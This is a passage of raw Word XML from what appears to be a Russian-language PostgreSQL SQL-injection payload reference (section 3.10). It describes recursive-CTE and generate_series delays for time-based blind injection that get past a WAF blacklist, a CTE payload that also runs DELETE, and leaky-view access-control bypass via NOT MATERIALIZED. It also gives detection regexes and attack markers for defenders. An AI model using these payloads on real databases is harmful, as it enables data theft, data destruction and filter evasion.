        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursive CTE и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 частые в reporting и hierarchical-query коде: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Hierarchical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RECURSIVE tree AS (SELECT id, parent_id FROM nodes WHERE id=1 UNION ALL SELECT n.id, n.parent_id FROM nodes n JOIN tree t ON n.parent_id=t.id) SELECT * FROM tree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Date series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day::date FROM generate_series('2026-01-01', '2026-12-31', '1 day'::interval) day</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Number ranges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INSERT INTO t SELECT i, 'val' FROM generate_series(1, 100) i</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Маркеры атаки vs легитимного использования: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 в payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: legitimate использование — N до 10000 (макс reasonable depth), N=100M — почти всегда атака.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Контекст в WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: legitimate CTE — обычно top-level (SELECT FROM cte WHERE ...); CTE в WHERE-clause </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT count(*) FROM (WITH RECURSIVE ...) ) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нелегитимный паттерн, индикатор atomic-delay-injection.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запись с recursive CTE и большим constant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 анти-паттерн legitimate-кода (они обычно параметризованы).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HTTP-RTT distribution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: legitimate-эндпоинт имеет узкое распределение RTT (median ~10-50ms); time-based-эндпоинт показывает bimodal distribution: 10ms (false-branch) или 3-5s (true-branch). Сигнал заметен в P99-метриках.</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8.4 – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые) — recursive CTE.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9.1+</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generate_series(timestamp, timestamp, interval)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (date-version).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15+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обновлённый regex-engine (Henry-Spencer fork), всё ещё уязвим к catastrophic backtracking.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(Time-based blind)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — главный потребитель 3.10.2. 3.4 предполагает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как примитив; 3.10.2 даёт альтернативу.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3.9.0 (WAF в 3.9-категории)</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явно в blacklist. 3.10.2 — обход именно этого фильтра.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3.10.1 (Data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбо: CTE с DML внутри recursive — расход CPU + write-эффект в одной операции (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE r AS (SELECT 1 UNION ALL SELECT n+1 FROM r WHERE n&lt;1M), del AS (DELETE FROM t RETURNING 1) SELECT count(*) FROM r, del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3.10.3 (Leaky views)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — recursive CTE может усиливать leak через repeat-call к leaky-функции в каждой итерации.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FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RCE-альтернатива time-based: вместо oracle через delay, целевая RCE; не пересекаются по semantic, но обе требуют 3.9-обходов в WAF-окружениях.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регекса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bWITH\s+RECURSIVE\b.*?\b\d{6,}\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (recursive с N≥10^6) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bgenerate_series\s*\(\s*\d+\s*,\s*\d{7,}</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3.10 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.10.md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Recursive Queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — спецификация recursive CTE.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Set Returning Functions — generate_series</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — built-in для CPU-bound delay.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pgcrypto — crypt, gen_salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bcrypt-based delay.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OWASP: ReDoS — Catastrophic backtracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основа для Payload 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 blind time delays without pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст альтернативных delay-примитивов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10.3 Leaky views + CTE materialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.10.0.</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«Leaky views» — класс уязвимостей PostgreSQL, когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">дешёвая</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> функция или оператор, поданный атакующим в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-клаузу запроса к view, исполняется планировщиком </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE-фильтра самой view. Это позволяет атакующему вызвать leaky-функцию на строках, которые view должна была скрыть.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита PG — атрибут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для view (доступно с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), который запрещает планировщику push-down дешёвых функций через view-границу. Защита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">по умолчанию выключена</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security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — потому что включение часто ломает performance legitimate-запросов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CTE играет роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">контролёра plan-shape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x AS (SELECT * FROM view) SELECT * FROM x WHERE leaky(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG ≤ 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTE всегда материализован (фенс), leaky() гарантированно после view-фильтра — leak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">невозможен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даже без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 12+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTE inlined по умолчанию (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), и привязанный поверх view запрос становится эквивалентен прямому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT FROM view WHERE leaky(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — leak возможен, как без CTE.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x AS MATERIALIZED (SELECT * FROM view) SELECT * FROM x WHERE leaky(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — явная </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-форма (PG 12+) принудительно материализует — leak невозможен, как в PG ≤ 11.</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x AS NOT MATERIALIZED (SELECT * FROM view) SELECT * FROM x WHERE leaky(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — явный inline, дефолт на PG 12+.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уже</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет leaky-функцию (или может её создать через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на user-schema), использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для гарантии leak в PG-12+-окружении. Если application пытается защититься через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH x AS (SELECT * FROM view)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рассчитывая на pre-PG-12-поведение), attacker делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH x AS NOT MATERIALIZED (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для отмены защиты — это и есть «обход CTE как ACL-механизма».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup для всех payload-ов 3.10.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- View с ACL-фильтром, БЕЗ security_barrier (дефолт)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE VIEW orders_visible AS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, customer_name, total, internal_notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE customer_id = current_setting('app.current_user_id')::int;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Application-роль имеет SELECT только на orders_visible, не на orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT ON orders_visible TO app_user;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
